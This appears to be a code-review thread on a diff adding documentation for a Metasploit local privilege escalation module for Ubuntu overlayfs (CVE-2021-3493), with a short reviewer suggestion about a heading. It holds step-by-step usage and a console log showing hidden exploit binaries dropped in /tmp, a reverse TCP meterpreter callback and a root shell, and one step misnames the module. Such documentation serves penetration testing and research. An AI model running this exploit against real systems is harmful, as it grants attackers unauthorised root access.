documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md

```diff
@@ -0,0 +1,106 @@
+into the `vfs_setxattr` function that sets the attribute, forcing verification every time the
+`vfs_setxattr` is called rather than trusting the data was already verified.
+
+### Install
+
+Install Ubuntu from version 14.04LTS to 20.04 LTS
+
+## Verification Steps
+
+1. Make an Ubuntu
+1. Create a meterpreter or shell payload and upload it to the Ubuntu target
+1. Set up a handler for the payload
+1. Launch the payload as a regular user on the Ubuntu Target and connect the handler
+1. Do: `use exploit/linux/local/cve_2021_3943_overlayfs`
+1. Do: `set payload <payload>`
+1. Do: `set lhost <ip>`
+1. Do: `set [r|l]port <port>`
+1. Do: `run`
+1. You should get a root session
+
+## Options
+
+### COMPILE
+
+[Auto|True|False] This selects the binary to use.  True will upload the source code and perform
+compilation on target, False will upload a precompiled binary.  AUTO will favor compiling on target
+but will fall back to the precompiled option if a compiler cannot be found.
+
+### WritableDir
+This indicates the location where you would like the payload and exploit binary stored, as well
+as serving as a location to store the various files and directories created by the exploit itself.
+The default value is `/tmp`
+
+### Ubuntu 20.04.0 x64
+
+```
+msf6 exploit(linux/local/cve_2021_3493_overlayfs) > 
+[*] Sending stage (3012548 bytes) to 192.168.132.138
+[*] Meterpreter session 9 opened (192.168.135.197:4567 -> 192.168.132.138:47988 ) at 2021-11-09 11:34:44 -0600
+
+msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 9
+[*] Starting interaction with 9...
+
+meterpreter > sysinfo
+Computer     : ubuntu-20.04.0
+OS           : Ubuntu 20.04 (Linux 5.4.0-26-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: msfuser
+meterpreter > background
+[*] Backgrounding session 9...
+msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 9
+session => 9
+msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run
+
+[*] Started reverse TCP handler on 192.168.135.197:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version array: ["5.4.0", "26", "generic"]
+[*] major_version: 5.4.0
+[*] minor_version: 26
+[+] The target appears to be vulnerable.
+[*] Creating directory /tmp/.wH0xRHji
+[*] /tmp/.wH0xRHji created
+[*] Dropping pre-compiled exploit on system...
+[*] Writing '/tmp/.wH0xRHji/.PsJzzn' (17840 bytes) ...
+[*] Writing '/tmp/.wH0xRHji/.Doeg4dSW1G' (250 bytes) ...
+[*] Launching exploit...
+[*] Running: /tmp/.wH0xRHji/.PsJzzn /tmp/.wH0xRHji/.Doeg4dSW1G /tmp/.wH0xRHji 6PFbO1d
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3012548 bytes) to 192.168.132.138
+[+] Deleted /tmp/.wH0xRHji/.PsJzzn
+[*] Meterpreter session 10 opened (192.168.135.197:4444 -> 192.168.132.138:41814 ) at 2021-11-09 11:35:05 -0600
+[*] 
+
+meterpreter > getuid
+Server username: root
+```
+
+### Included binary
```

Comment:
Capitalization for consistency + pluralization

```suggestion
### Included Binaries
```

Reply:
Forgot to change this after I added aarch64 support- great catch!  Thanks!